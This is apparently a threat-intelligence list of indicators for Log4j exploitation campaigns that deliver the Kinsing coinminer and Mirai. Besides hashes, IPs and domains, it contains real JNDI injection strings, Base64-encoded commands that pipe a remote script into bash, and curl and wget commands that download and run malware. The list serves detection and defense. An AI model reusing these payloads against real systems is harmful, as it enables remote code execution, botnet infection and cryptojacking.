Hashes SHA1 1d1866b00f948c103a9076b39061bde5c1f68350 - Backdoor.Linux.MIRAI.SEMR 8dcfce4dcfbead344c15dfc4b3a4395dd0f9750f - Trojan.SH.KINSING.H 284a97cab405a28732035186a0c6306a692d4480 - Trojan.SH.KINSING.I 0194637f1e83c2efc8bcda8d20c446805698c7bc - Coinminer.Linux.KINSING.D ----------------------------------------------------------------------- HTTP Headers $%7Bjndi%3Aldaps%3A//0384eb5a.probe001.log4j[.]leakix.net%3A1266/b%7D $%7Bjndi:ldaps://029e7c6c.probe001.log4j[.]leakix.net:1266/b%7D ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback} ${jndi:ldap://015ed9119662[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://32fce0c1f193[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://3be6466b6a20[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==} ${jndi:ldap://45.155.205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK} ${jndi:ldap://4568-3409-8076-3389.service[.]exfil.site} ${jndi:ldap://6c8d7dd40593[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://7faf976567f5[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://80.71.158[.]12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=} ${jndi:ldap://e86eafcf9294[.]bingsearchlib[.]com:39356/a} ${jndi:ldap:/jjug8i.xaliyun[.]com/x} ?&token=${jndi:rmi://vyvdsvh.x.i.yunzhanghu[.]co:443/abc} 500.html?aspxerrorpath=/${jndi:ldap:/45[.]130.229.168:1389/Exploit} login?next=${jndi:dns://lnc7vvhztmjdfm221sdp76xnze5atz.burpcollaborator[.]net:443} ---------------------------------------------------------------------------------- IP Addresses 104.244.79[.]6 109.237.96[.]124 171.25.193[.]20 171.25.193[.]25 171.25.193[.]77 171.25.193[.]78 178.17.171[.]102 18.27.197[.]252 185.100.87[.]202 185.220.100[.]242 185.220.101[.]146 185.220.101[.]39 213.164.204[.]146 45.155.205[.]233 89.234.182[.]139 -------------------------------------------------------- Kinsing Mining Activity Commands curl -o /tmp/kinsing http://80.71.158.12/kinsing curl -o /tmp/libsystem.so http://80.71.158.12/libsystem.so curl -o /etc/kinsing http://80.71.158.12/kinsing chmod 777 /tmp/kinsing chattr -R -i /var/spool/cron chmod +x /etc/kinsing URLs http[:]//45.137.155[.]55/ex[.]sh http[:]//45.137.155[.]55/kinsing http[:]//80.71.158[.]12/libsystem.so http[:]//80.71.158[.]12/kinsing http[:]//80.71.158[.]12/Exploit69ogQNSQYz.class Hashes SHA256 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b 8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef C38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a Hashes SHA1 1d1866b00f948c103a9076b39061bde5c1f68350 8dcfce4dcfbead344c15dfc4b3a4395dd0f9750f 284a97cab405a28732035186a0c6306a692d4480 0194637f1e83c2efc8bcda8d20c446805698c7bc e851126ef41e3dc474238d3160f4b0e7e3bbb7ec -------------------------------------------------------------------------------- Mirai Infection Activity Mirai retrieval script (SHA256) 3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 (lh[.]sh) Binary retrieval/execution commands wget hxxp[:]//62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86; wget hxxp[:]//62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64; wget hxxp[:]//62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g; Mirai binary hashes (SHA256) 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81 Mirai attacker IP address 62.210.130[.]250 ------------------------------------------------------------------------------ Additional Malware Payload Hashes SHA256 0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049 19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d 2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129 5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28 6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b 63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9 6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05 715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81 a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778 b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0 c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40 c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799 e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80 fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0 ------------------------------------------------------------------------------- Observed Domains abrahackbugs[.]xyz cuminside[.]club m3[.]wtf pwn[.]af rce[.]ee x41[.]me